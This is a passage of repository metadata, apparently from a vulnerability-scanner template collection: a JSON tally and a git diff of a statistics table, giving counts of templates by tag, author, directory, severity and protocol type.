:"aspnuke","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plastic","count":1},{"name":"optimizely","count":1},{"name":"craftcms","count":1},{"name":"froxlor","count":1},{"name":"spidercontrol","count":1},{"name":"postmark","count":1},{"name":"package","count":1},{"name":"secmail","count":1},{"name":"simplecrm","count":1},{"name":"xvr","count":1},{"name":"dnssec","count":1},{"name":"wildfly","count":1},{"name":"xmlchart","count":1},{"name":"proftpd","count":1},{"name":"okiko","count":1},{"name":"klog","count":1},{"name":"adafruit","count":1},{"name":"pippoint","count":1},{"name":"memcached","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"gotmls","count":1},{"name":"jenkin","count":1},{"name":"jnoj","count":1},{"name":"mongoshake","count":1},{"name":"sgp","count":1},{"name":"emby","count":1},{"name":"pcoip","count":1},{"name":"jitsi","count":1},{"name":"mara","count":1},{"name":"tinymce","count":1},{"name":"episerver","count":1},{"name":"bolt","count":1},{"name":"xunchi","count":1},{"name":"sprintful","count":1},{"name":"bazarr","count":1},{"name":"testrail","count":1},{"name":"sqlite","count":1},{"name":"lighttpd","count":1},{"name":"calendly","count":1},{"name":"accela","count":1},{"name":"seacms","count":1},{"name":"bigbluebutton","count":1},{"name":"shoppable","count":1},{"name":"mkdocs","count":1},{"name":"visualstudio","count":1},{"name":"sangfor","count":1},{"name":"ems","count":1},{"name":"solman","count":1},{"name":"tileserver","count":1},{"name":"iptime","count":1},{"name":"clickhouse","count":1},{"name":"anchorcms","count":1},{"name":"meraki","count":1},{"name":"postgres","count":1},{"name":"expn","count":1},{"name":"iterable","count":1},{"name":"chinaunicom","count":1},{"name":"timeclock","count":1},{"name":"landrayoa","count":1},{"name":"chevereto","count":1},{"name":"cves2001","count":1},{"name":"sterling","count":1},{"name":"travis","count":1},{"name":"streetview","count":1},{"name":"rdp","count":1},{"name":"opentsdb","count":1},{"name":"clockwatch","count":1},{"name":"ognl","count":1},{"name":"finereport","count":1},{"name":"fortilogger","count":1},{"name":"intercom","count":1},{"name":"weglot","count":1},{"name":"gitlist","count":1},{"name":"daybyday","count":1},{"name":"hortonworks","count":1},{"name":"cgi","count":1},{"name":"leanix","count":1},{"name":"opensns","count":1},{"name":"announcekit","count":1},{"name":"javascript","count":1},{"name":"maccmsv10","count":1},{"name":"adb","count":1},{"name":"terraform","count":1},{"name":"circontrorl","count":1},{"name":"xdcms","count":1},{"name":"duomicms","count":1},{"name":"eyou","count":1},{"name":"crm","count":1},{"name":"beanstalk","count":1},{"name":"panos","count":1},{"name":"resourcespace","count":1},{"name":"openstack","count":1},{"name":"panasonic","count":1},{"name":"route","count":1},{"name":"redmine","count":1},{"name":"nette","count":1},{"name":"digitalocean","count":1},{"name":"zte","count":1},{"name":"spotify","count":1},{"name":"nuxeo","count":1},{"name":"stripe","count":1},{"name":"default","count":1},{"name":"extractor","count":1},{"name":"natemail","count":1},{"name":"cherokee","count":1},{"name":"office365","count":1},{"name":"pendo","count":1},{"name":"gespage","count":1},{"name":"nearby","count":1},{"name":"flink","count":1},{"name":"dahua","count":1},{"name":"asana","count":1},{"name":"asus","count":1},{"name":"traefik","count":1},{"name":"cvnd","count":1},{"name":"octoprint","count":1},{"name":"shopxo","count":1},{"name":"sco","count":1},{"name":"phpfusion","count":1},{"name":"circontrol","count":1},{"name":"postmessage","count":1},{"name":"mdb","count":1},{"name":"webex","count":1},{"name":"placeos","count":1},{"name":"apiman","count":1},{"name":"setup","count":1},{"name":"tensorflow","count":1},{"name":"tensorboard","count":1},{"name":"elasticsearch","count":1},{"name":"mariadb","count":1},{"name":"socomec","count":1},{"name":"monitorix","count":1},{"name":"nedi","count":1},{"name":"visualtools","count":1},{"name":"jfrog","count":1},{"name":"wakatime","count":1},{"name":"esmtp","count":1},{"name":"apos","count":1},{"name":"woocomernce","count":1},{"name":"nomad","count":1},{"name":"redwood","count":1},{"name":"apigee","count":1},{"name":"webui","count":1},{"name":"metabase","count":1},{"name":"expressjs","count":1},{"name":"appweb","count":1},{"name":"sarg","count":1},{"name":"olivetti","count":1},{"name":"st","count":1},{"name":"shoretel","count":1},{"name":"landray","count":1},{"name":"mpsec","count":1},{"name":"loqate","count":1},{"name":"burp","count":1},{"name":"shiro","count":1},{"name":"discord","count":1},{"name":"uwsgi","count":1},{"name":"bingmaps","count":1},{"name":"geddy","count":1},{"name":"tectuus","count":1},{"name":"fastapi","count":1},{"name":"sendgrid","count":1},{"name":"avalanche","count":1},{"name":"gitea","count":1},{"name":"locations","count":1},{"name":"labtech","count":1},{"name":"sast","count":1},{"name":"wiki","count":1},{"name":"comodo","count":1},{"name":"optiLink","count":1},{"name":"dwsync","count":1},{"name":"glances","count":1},{"name":"smartsense","count":1},{"name":"imap","count":1},{"name":"panabit","count":1},{"name":"graphql","count":1},{"name":"whm","count":1},{"name":"lg-nas","count":1},{"name":"phpshowtime","count":1},{"name":"syslog","count":1},{"name":"basic-auth","count":1},{"name":"pacsone","count":1},{"name":"xmpp","count":1},{"name":"ntopng","count":1},{"name":"mailgun","count":1},{"name":"webftp","count":1},{"name":"hiboss","count":1},{"name":"tjws","count":1},{"name":"motorola","count":1},{"name":"nps","count":1},{"name":"pyramid","count":1},{"name":"argussurveillance","count":1},{"name":"cve202","count":1},{"name":"b2evolution","count":1},{"name":"embedthis","count":1},{"name":"etherpad","count":1},{"name":"fortigate","count":1},{"name":"bullwark","count":1},{"name":"clusterengine","count":1},{"name":"majordomo2","count":1},{"name":"kyan","count":1},{"name":"clockwork","count":1},{"name":"haproxy","count":1},{"name":"myucms","count":1},{"name":"sugarcrm","count":1},{"name":"erp-nc","count":1},{"name":"sql","count":1},{"name":"phpfastcache","count":1},{"name":"remkon","count":1},{"name":"contentkeeper","count":1},{"name":"floc","count":1},{"name":"skywalking","count":1},{"name":"codeigniter","count":1},{"name":"fortiweb","count":1},{"name":"adiscon","count":1},{"name":"wazuh","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"graph","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"calendarix","count":1},{"name":"webmodule-ee","count":1},{"name":"nifi","count":1},{"name":"tapestry","count":1},{"name":"zend","count":1},{"name":"zzzcms","count":1},{"name":"nerdgraph","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"jquery","count":1},{"name":"billquick","count":1},{"name":"flexbe","count":1},{"name":"cobub","count":1},{"name":"clink-office","count":1},{"name":"twitter","count":1},{"name":"wifisky","count":1},{"name":"dompdf","count":1},{"name":"place","count":1}],"authors":[{"name":"dhiyaneshdk","count":300},{"name":"daffainfo","count":290},{"name":"pikpikcu","count":281},{"name":"pdteam","count":202},{"name":"geeknik","count":166},{"name":"dwisiswant0","count":152},{"name":"gy741","count":83},{"name":"pussycat0x","count":76},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":58},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"johnk3r","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"e_schultze_","count":4},{"name":"wisnupramoedya","count":4},{"name":"github.com/its0x08","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"nodauf","count":4},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"sullo","count":3},{"name":"_generic_human_","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"shine","count":3},{"name":"me9187","count":3},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"dudez","count":3},{"name":"shifacyclewala","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"johnjhacking","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"impramodsargar","count":3},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"kiblyn11","count":2},{"name":"bernardofsr","count":2},{"name":"davidmckennirey","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"foulenzer","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"ree4pwn","count":2},{"name":"bing0o","count":2},{"name":"swissky","count":2},{"name":"martincodes-de","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"zomsop82","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"parth","count":2},{"name":"0xprial","count":2},{"name":"huowuzhao","count":2},{"name":"r3naissance","count":2},{"name":"lark-lab","count":2},{"name":"udit_thakkur","count":2},{"name":"sy3omda","count":2},{"name":"gevakun","count":2},{"name":"cocxanh","count":2},{"name":"0xsmiley","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"afaq","count":2},{"name":"mohammedsaneem","count":2},{"name":"whoever","count":2},{"name":"ehsahil","count":2},{"name":"convisoappsec","count":2},{"name":"hetroublemakr","count":2},{"name":"hahwul","count":2},{"name":"g4l1t0","count":2},{"name":"gal nagli","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"x1m_martijn","count":2},{"name":"r12w4n","count":2},{"name":"amsda","count":2},{"name":"dahse89","count":2},{"name":"bp0lr","count":2},{"name":"randomrobbie","count":2},{"name":"joeldeleep","count":2},{"name":"lotusdll","count":2},{"name":"socketz","count":2},{"name":"0xrudra","count":2},{"name":"nkxxkn","count":2},{"name":"0xcrypto","count":2},{"name":"bsysop","count":2},{"name":"kaizensecurity","count":1},{"name":"furkansenan","count":1},{"name":"nerrorsec","count":1},{"name":"sshell","count":1},{"name":"ajaysenr","count":1},{"name":"bad5ect0r","count":1},{"name":"raesene","count":1},{"name":"mah3sec_","count":1},{"name":"florianmaak","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"sickwell","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"omarkurt","count":1},{"name":"clarkvoss","count":1},{"name":"makyotox","count":1},{"name":"apt-mirror","count":1},{"name":"elouhi","count":1},{"name":"wabafet","count":1},{"name":"b4uh0lz","count":1},{"name":"thevillagehacker","count":1},{"name":"fmunozs","count":1},{"name":"borna nematzadeh","count":1},{"name":"regala_","count":1},{"name":"evolutionsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"zandros0","count":1},{"name":"alperenkesk","count":1},{"name":"dawid-czarnecki","count":1},{"name":"retr02332","count":1},{"name":"thebinitghimire","count":1},{"name":"elmahdi","count":1},{"name":"0xd0ff9","count":1},{"name":"remonsec","count":1},{"name":"elder tao","count":1},{"name":"ringo","count":1},{"name":"_darrenmartyn","count":1},{"name":"xstp","count":1},{"name":"andirrahmani1","count":1},{"name":"smaranchand","count":1},{"name":"philippdelteil","count":1},{"name":"_c0wb0y_","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"rodnt","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sbani","count":1},{"name":"_harleo","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"its0x08","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"@dwisiswant0","count":1},{"name":"soyelmago","count":1},{"name":"jeya seelan","count":1},{"name":"manuelbua","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"0xteles","count":1},{"name":"becivells","count":1},{"name":"pdp","count":1},{"name":"pratik khalane","count":1},{"name":"x6263","count":1},{"name":"oscarintherocks","count":1},{"name":"patralos","count":1},{"name":"push4d","count":1},{"name":"jteles","count":1},{"name":"lark lab","count":1},{"name":"ipanda","count":1},{"name":"alph4byt3","count":1},{"name":"petruknisme","count":1},{"name":"exploitation","count":1},{"name":"berkdusunur","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"schniggie","count":1},{"name":"kurohost","count":1},{"name":"0h1in9e","count":1},{"name":"akshansh","count":1},{"name":"rojanrijal","count":1},{"name":"juicypotato1","count":1},{"name":"th3.d1p4k","count":1},{"name":"thezakman","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"nvn1729","count":1},{"name":"jrolf","count":1},{"name":"52971","count":1},{"name":"blckraven","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"harshinsecurity","count":1},{"name":"infosecsanyam","count":1},{"name":"@ofjaaah","count":1},{"name":"sicksec","count":1},{"name":"s1r1u5_","count":1},{"name":"deena","count":1},{"name":"tim_koopmans","count":1},{"name":"droberson","count":1},{"name":"kareemse1im","count":1},{"name":"absshax","count":1},{"name":"ahmetpergamum","count":1},{"name":"mesaglio","count":1},{"name":"zhenwarx","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"yavolo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"co0nan","count":1},{"name":"notsoevilweasel","count":1},{"name":"adrianmf","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"affix","count":1},{"name":"alex","count":1},{"name":"tirtha_mandal","count":1},{"name":"lethargynavigator","count":1},{"name":"micha3lb3n","count":1},{"name":"orpheus","count":1},{"name":"brabbit10","count":1},{"name":"luskabol","count":1},{"name":"j33n1k4","count":1},{"name":"shelld3v","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"noamrathaus","count":1},{"name":"ahmed sherif","count":1},{"name":"b0rn2r00t","count":1},{"name":"qlkwej","count":1},{"name":"revblock","count":1},{"name":"b0yd","count":1},{"name":"pudsec","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"kabirsuda","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik airane","count":1},{"name":"_0xf4n9x_","count":1},{"name":"shifacyclewla","count":1},{"name":"izn0u","count":1},{"name":"yashgoti","count":1},{"name":"retr0","count":1},{"name":"sec_hawk","count":1},{"name":"mubassirpatel","count":1},{"name":"gboddin","count":1},{"name":"0xtavian","count":1},{"name":"geraldino2","count":1},{"name":"nytr0gen","count":1},{"name":"igibanez","count":1},{"name":"rotemreiss","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"d0rkerdevil","count":1},{"name":"luci","count":1},{"name":"aresx","count":1},{"name":"andysvints","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"iampritam","count":1},{"name":"intx0x80","count":1},{"name":"mhdsamx","count":1},{"name":"ohlinge","count":1},{"name":"ldionmarcil","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"flag007","count":1},{"name":"defr0ggy","count":1},{"name":"majidmc2","count":1},{"name":"bolli95","count":1},{"name":"daviey","count":1},{"name":"kre80r","count":1},{"name":"mass0ma","count":1}],"directory":[{"name":"cves","count":847},{"name":"vulnerabilities","count":332},{"name":"exposed-panels","count":286},{"name":"technologies","count":203},{"name":"exposures","count":199},{"name":"misconfiguration","count":143},{"name":"token-spray","count":83},{"name":"takeovers","count":66},{"name":"default-logins","count":60},{"name":"file","count":51},{"name":"workflows","count":38},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":806},{"name":"high","count":655},{"name":"medium","count":483},{"name":"critical","count":299},{"name":"low","count":157}],"types":[{"name":"http","count":2286},{"name":"file","count":51},{"name":"network","count":46},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index ab1e9dcf49..320f1a6be8 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,930 +1,964 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | -| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | -| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | -| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | -| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | -| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | -| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | -| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 166 | zzeitlin | 63 | file | 50 | | | | | -| cve2021 | 157 | madrobot | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 55 | iot | 36 | | | | | +| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | +| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | +| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | +| wordpress | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | +| xss | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | +| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | +| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | +| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | +| cve2021 | 160 | zzeitlin | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 58 | iot | 36 | | | | | | cve2010 | 109 | gaurang | 42 | network | 33 | | | | | -| config | 99 | philippedelteil | 30 | miscellaneous | 24 | | | | | +| config | 99 | philippedelteil | 31 | miscellaneous | 24 | | | | | | cve2019 | 98 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | -| iot | 79 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 73 | pr3r00t | 15 | headless | 5 | | | | | -| oast | 70 | milo2012 | 14 | | | | | | | -| takeover | 69 | techbrunchfr | 13 | | | | | | | -| default-login | 68 | suman_kar | 12 | | | | | | | -| token | 67 | cyllective | 11 | | | | | | | -| token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | random_robbie | 10 | | | | | | | -| file | 50 | nadino | 10 | | | | | | | -| unauth | 49 | wdahlenb | 10 | | | | | | | -| network | 44 | melbadry9 | 10 | | | | | | | -| ssrf | 42 | righettod | 10 | | | | | | | -| sqli | 40 | hackergautam | 9 | | | | | | | -| | 39 | that_juan_ | 8 | | | | | | | -| redirect | 38 | zh | 8 | | | | | | | -| cve2016 | 38 | aashiq | 8 | | | | | | | -| oracle | 37 | iamthefrogy | 8 | | | | | | | +| cve2018 | 92 | organiccrap | 24 | cnvd | 10 | | | | | +| token-spray | 83 | pr3r00t | 15 | fuzzing | 10 | | | | | +| iot | 80 | sheikhrishad | 15 | headless | 5 | | | | | +| apache | 74 | milo2012 | 14 | | | | | | | +| oast | 71 | techbrunchfr | 13 | | | | | | | +| takeover | 70 | suman_kar | 12 | | | | | | | +| default-login | 68 | cyllective | 11 | | | | | | | +| token | 67 | r3dg33k | 11 | | | | | | | +| file | 51 | random_robbie | 10 | | | | | | | +| cve2017 | 51 | wdahlenb | 10 | | | | | | | +| unauth | 50 | righettod | 10 | | | | | | | +| network | 44 | nadino | 10 | | | | | | | +| ssrf | 42 | melbadry9 | 10 | | | | | | | +| sqli | 41 | hackergautam | 9 | | | | | | | +| cve2016 | 39 | iamthefrogy | 8 | | | | | | | +| | 39 | zh | 8 | | | | | | | +| redirect | 38 | aashiq | 8 | | | | | | | +| oracle | 37 | that_juan_ | 8 | | | | | | | | google | 30 | harshbothra_ | 7 | | | | | | | -| logs | 30 | randomstr1ng | 7 | | | | | | | -| jira | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 29 | techryptic (@tech) | 7 | | | | | | | -| listing | 27 | dogasantos | 7 | | | | | | | -| cisco | 27 | meme-lord | 7 | | | | | | | -| cve2014 | 27 | dr_set | 7 | | | | | | | -| generic | 24 | kophjager007 | 7 | | | | | | | -| auth-bypass | 24 | emadshanab | 7 | | | | | | | -| misconfig | 23 | logicalhunter | 6 | | | | | | | -| misc | 23 | __fazal | 6 | | | | | | | -| disclosure | 23 | pentest_swissky | 6 | | | | | | | -| router | 22 | caspergn | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| springboot | 18 | divya_mudgal | 6 | | | | | | | -| cve2012 | 18 | panch0r3d | 5 | | | | | | | -| sap | 18 | rootxharsh | 5 | | | | | | | -| debug | 17 | johnk3r | 5 | | | | | | | -| weblogic | 15 | yanyun | 5 | | | | | | | -| cve2011 | 15 | iamnoooob | 5 | | | | | | | -| php | 15 | elsfa7110 | 5 | | | | | | | -| devops | 15 | lu4nx | 5 | | | | | | | -| login | 14 | ganofins | 5 | | | | | | | -| cve2009 | 14 | xelkomy | 5 | | | | | | | -| aws | 14 | joanbono | 5 | | | | | | | -| struts | 14 | e_schultze_ | 4 | | | | | | | -| fuzz | 14 | incogbyte | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | +| cve2015 | 30 | kophjager007 | 7 | | | | | | | +| logs | 30 | oppsec | 7 | | | | | | | +| atlassian | 29 | techryptic (@tech) | 7 | | | | | | | +| jira | 29 | emadshanab | 7 | | | | | | | +| cisco | 28 | 0x240x23elu | 7 | | | | | | | +| cve2014 | 27 | meme-lord | 7 | | | | | | | +| listing | 27 | randomstr1ng | 7 | | | | | | | +| auth-bypass | 25 | dogasantos | 7 | | | | | | | +| generic | 24 | dr_set | 7 | | | | | | | +| misconfig | 23 | __fazal | 6 | | | | | | | +| misc | 23 | puzzlepeaches | 6 | | | | | | | +| disclosure | 23 | divya_mudgal | 6 | | | | | | | +| router | 22 | logicalhunter | 6 | | | | | | | +| aem | 19 | johnk3r | 6 | | | | | | | +| cve2012 | 18 | pentest_swissky | 6 | | | | | | | +| sap | 18 | caspergn | 6 | | | | | | | +| springboot | 18 | xelkomy | 5 | | | | | | | +| debug | 17 | ganofins | 5 | | | | | | | +| php | 15 | joanbono | 5 | | | | | | | +| cve2011 | 15 | panch0r3d | 5 | | | | | | | +| devops | 15 | elsfa7110 | 5 | | | | | | | +| weblogic | 15 | rootxharsh | 5 | | | | | | | +| fuzz | 14 | lu4nx | 5 | | | | | | | +| wp-theme | 14 | yanyun | 5 | | | | | | | +| login | 14 | iamnoooob | 5 | | | | | | | +| aws | 14 | incogbyte | 4 | | | | | | | +| cve2009 | 14 | nodauf | 4 | | | | | | | +| struts | 14 | github.com/its0x08 | 4 | | | | | | | | deserialization | 13 | tess | 4 | | | | | | | -| zoho | 13 | wisnupramoedya | 4 | | | | | | | -| adobe | 13 | github.com/its0x08 | 4 | | | | | | | -| dlink | 13 | emenalf | 3 | | | | | | | -| dns | 13 | yash anand @yashanand155 | 3 | | | | | | | -| wp-theme | 12 | binaryfigments | 3 | | | | | | | -| jenkins | 12 | mavericknerd | 3 | | | | | | | -| manageengine | 12 | sushantkamble | 3 | | | | | | | -| xxe | 11 | fyoorer | 3 | | | | | | | -| magento | 11 | f1tz | 3 | | | | | | | -| cve2013 | 11 | impramodsargar | 3 | | | | | | | -| hp | 10 | 0w4ys | 3 | | | | | | | -| intrusive | 10 | me9187 | 3 | | | | | | | -| dell | 10 | sullo | 3 | | | | | | | -| kubernetes | 9 | johnjhacking | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| vmware | 9 | shine | 3 | | | | | | | -| ruijie | 8 | idealphase | 3 | | | | | | | -| cnvd | 8 | unstabl3 | 3 | | | | | | | -| backup | 8 | shifacyclewala | 3 | | | | | | | -| cve2008 | 8 | z3bd | 3 | | | | | | | -| ibm | 8 | dudez | 3 | | | | | | | -| fastjson | 8 | _generic_human_ | 3 | | | | | | | -| nginx | 8 | jarijaas | 3 | | | | | | | -| airflow | 8 | skeltavik | 3 | | | | | | | -| rails | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | 0xprial | 2 | | | | | | | -| microsoft | 8 | w4cky_ | 2 | | | | | | | -| scada | 8 | ree4pwn | 2 | | | | | | | -| files | 7 | hahwul | 2 | | | | | | | -| confluence | 7 | huowuzhao | 2 | | | | | | | -| cms | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| netgear | 7 | ehsahil | 2 | | | | | | | -| coldfusion | 7 | gal nagli | 2 | | | | | | | -| rconfig | 6 | afaq | 2 | | | | | | | -| api | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | hetroublemakr | 2 | | | | | | | -| nodejs | 6 | arcc | 2 | | | | | | | -| fileupload | 6 | manas_harsh | 2 | | | | | | | -| solr | 6 | kiblyn11 | 2 | | | | | | | -| citrix | 6 | zomsop82 | 2 | | | | | | | -| jetty | 6 | x1m_martijn | 2 | | | | | | | -| camera | 6 | koti2 | 2 | | | | | | | -| docker | 6 | pxmme1337 | 2 | | | | | | | -| drupal | 6 | randomrobbie | 2 | | | | | | | -| lucee | 6 | alifathi-h1 | 2 | | | | | | | -| prometheus | 6 | bp0lr | 2 | | | | | | | -| django | 6 | random-robbie | 2 | | | | | | | -| phpmyadmin | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| wso2 | 5 | lotusdll | 2 | | | | | | | -| circarlife | 5 | r12w4n | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| ssti | 5 | foulenzer | 2 | | | | | | | -| crlf | 5 | bing0o | 2 | | | | | | | -| windows | 5 | gevakun | 2 | | | | | | | -| jolokia | 5 | whoever | 2 | | | | | | | -| tomcat | 5 | vavkamil | 2 | | | | | | | -| java | 5 | convisoappsec | 2 | | | | | | | -| dedecms | 5 | r3naissance | 2 | | | | | | | -| symfony | 5 | mohammedsaneem | 2 | | | | | | | -| iis | 5 | parth | 2 | | | | | | | -| headless | 5 | 0xsmiley | 2 | | | | | | | -| asp | 4 | moritz nentwig | 2 | | | | | | | -| moodle | 4 | joeldeleep | 2 | | | | | | | -| resin | 4 | bsysop | 2 | | | | | | | -| traversal | 4 | davidmckennirey | 2 | | | | | | | -| maps | 4 | socketz | 2 | | | | | | | -| strapi | 4 | nkxxkn | 2 | | | | | | | -| slack | 4 | 0xrudra | 2 | | | | | | | -| elastic | 4 | cocxanh | 2 | | | | | | | -| thinkphp | 4 | sy3omda | 2 | | | | | | | -| artifactory | 4 | udit_thakkur | 2 | | | | | | | -| grafana | 4 | 0xcrypto | 2 | | | | | | | -| microstrategy | 4 | dheerajmadhukar | 2 | | | | | | | -| proxy | 4 | amsda | 2 | | | | | | | -| magmi | 4 | fabaff | 2 | | | | | | | -| npm | 4 | 0xsapra | 2 | | | | | | | -| firebase | 4 | g4l1t0 | 2 | | | | | | | -| glpi | 4 | swissky | 2 | | | | | | | -| symantec | 4 | undefl0w | 1 | | | | | | | -| hongdian | 4 | schniggie | 1 | | | | | | | -| git | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| exchange | 4 | lark lab | 1 | | | | | | | -| firmware | 4 | alph4byt3 | 1 | | | | | | | -| fatpipe | 4 | apt-mirror | 1 | | | | | | | -| solarwinds | 4 | @ofjaaah | 1 | | | | | | | -| zabbix | 4 | thezakman | 1 | | | | | | | -| amazon | 4 | ilovebinbash | 1 | | | | | | | -| zimbra | 4 | naglinagli | 1 | | | | | | | -| samsung | 4 | gboddin | 1 | | | | | | | -| webserver | 4 | alex | 1 | | | | | | | -| rfi | 4 | xstp | 1 | | | | | | | -| vpn | 4 | nvn1729 | 1 | | | | | | | -| buffalo | 4 | ringo | 1 | | | | | | | -| keycloak | 4 | jrolf | 1 | | | | | | | -| thinkcmf | 4 | jteles | 1 | | | | | | | -| telerik | 3 | qlkwej | 1 | | | | | | | -| kafka | 3 | fmunozs | 1 | | | 